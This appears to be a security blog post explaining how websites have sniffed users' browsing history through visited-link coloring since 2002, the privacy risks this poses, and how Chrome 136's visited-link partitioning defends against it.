In April, version 136 of Google Chrome was released, finally addressing a privacy concern that has been known since 2002 (which, by the way, also affects all other major browsers). This was particularly detrimental for unscrupulous marketers who had been taking advantage of it for 15 years. From this ominous description, you might be surprised to discover that the issue is a familiar and seemingly innocuous convenience: links that your browser changes to a different color after you visit them.
From a bright blue to a shade of purple
The practice of changing the color of links to indicate visited sites (by default from blue to purple) was first introduced 32 years ago with the NCSA Mosaic browser. This user-friendly feature was adopted by nearly all browsers in the 1990s, eventually becoming standardized in Cascading Style Sheets (CSS) — a language used to add style to web pages. Such recoloring has become the default in all popular browsers today.
However, as early as 2002, researchers identified that this feature was open to abuse through the placement of numerous invisible links on a page, using JavaScript to determine which of those links the browser marks as visited. Through this method, a malicious site could partially reveal a user’s browsing history.
In 2010, researchers found that several significant websites were utilizing this technique to spy on visitors, including YouPorn, TwinCities, and 480 other popular sites at the time. It was also discovered that platforms like Tealium and Beencounter were providing history-sniffing services, while the advertising company Interclick employed this technology for analytics and faced legal repercussions. Although they won the case, the major browsers subsequently modified their code for handling links to prevent detection of whether a link was visited.
Nevertheless, advancements in web technologies have led to new methods for covertly tracking browsing history. A 2018 study detailed four new ways to assess the status of links — two of which impacted all tested browsers except for the Tor Browser. One of the vulnerabilities — CVE-2018-6137 — allowed for checking visited sites at a rate of up to 3000 links per second. Meanwhile, new and increasingly sophisticated strategies for extracting browsing history continue to emerge.
Why history theft is perilous
Revealing your browsing history, even in part, represents several risks for users.
Reduced privacy. By knowing what websites you visit (especially those related to health, political affiliations, or topics such as dating, gambling, and adult content), attackers can exploit this information against you. They can customize a scam or bait specific to your situation — whether that involves extortion, a fraudulent charity, or the promise of new medication.
Targeted examinations. A site that sniffs history might, for instance, systematically check all the major banks’ websites to identify which one you utilize. Such intelligence can be beneficial to both cybercriminals (for crafting a fake payment form to deceive you) and legitimate companies (for observing which competitors you’ve explored).
Profiling and deanonymization. We’ve often discussed how advertisers and analytics firms track user behavior across the internet through cookies and fingerprinting. Your browsing history acts as a powerful identifier, particularly when paired with other tracking technologies. If an analytics company’s site can monitor what other sites you have accessed and when, it essentially operates like a super-cookie.
Defending against browser history theft
Basic protective measures were introduced in 2010 almost simultaneously in the Gecko (Firefox) and WebKit (Chrome and Safari) browsers. This protected against the basic code that could read the state of links.
Around that same period, Firefox 3.5 provided the option to entirely disable the recoloring of visited links. In the Firefox-based Tor Browser, this feature is enabled by default — but the option to save browsing history is turned off. This offers a strong defense against this category of attacks but significantly reduces convenience.
However, unless you are willing to forego a certain level of comfort, advanced attacks will still be able to detect your browsing history.
Efforts are underway at Google to significantly alter the current situation: beginning with version 136, Chrome will have visited link partitioning enabled by default. In essence, this functions as follows: links are only recolored if they were clicked from the present site; and when an attempt is made to check, a site can only “see” clicks that originated from itself.
The database of website visits (and clicked links) is kept separately for each domain. For example, assume bank.com integrates a widget providing information from banksupport.com, and this widget contains a link to centralbank.com. If you click the centralbank.com link, it will be marked as visited — but only within the banksupport.com widget on bank.com. If the identical banksupport.com widget appears on any other site, the centralbank.com link will be shown as unvisited. Chrome’s developers are extremely confident that partitioning represents the long-awaited solution.
Leave a Reply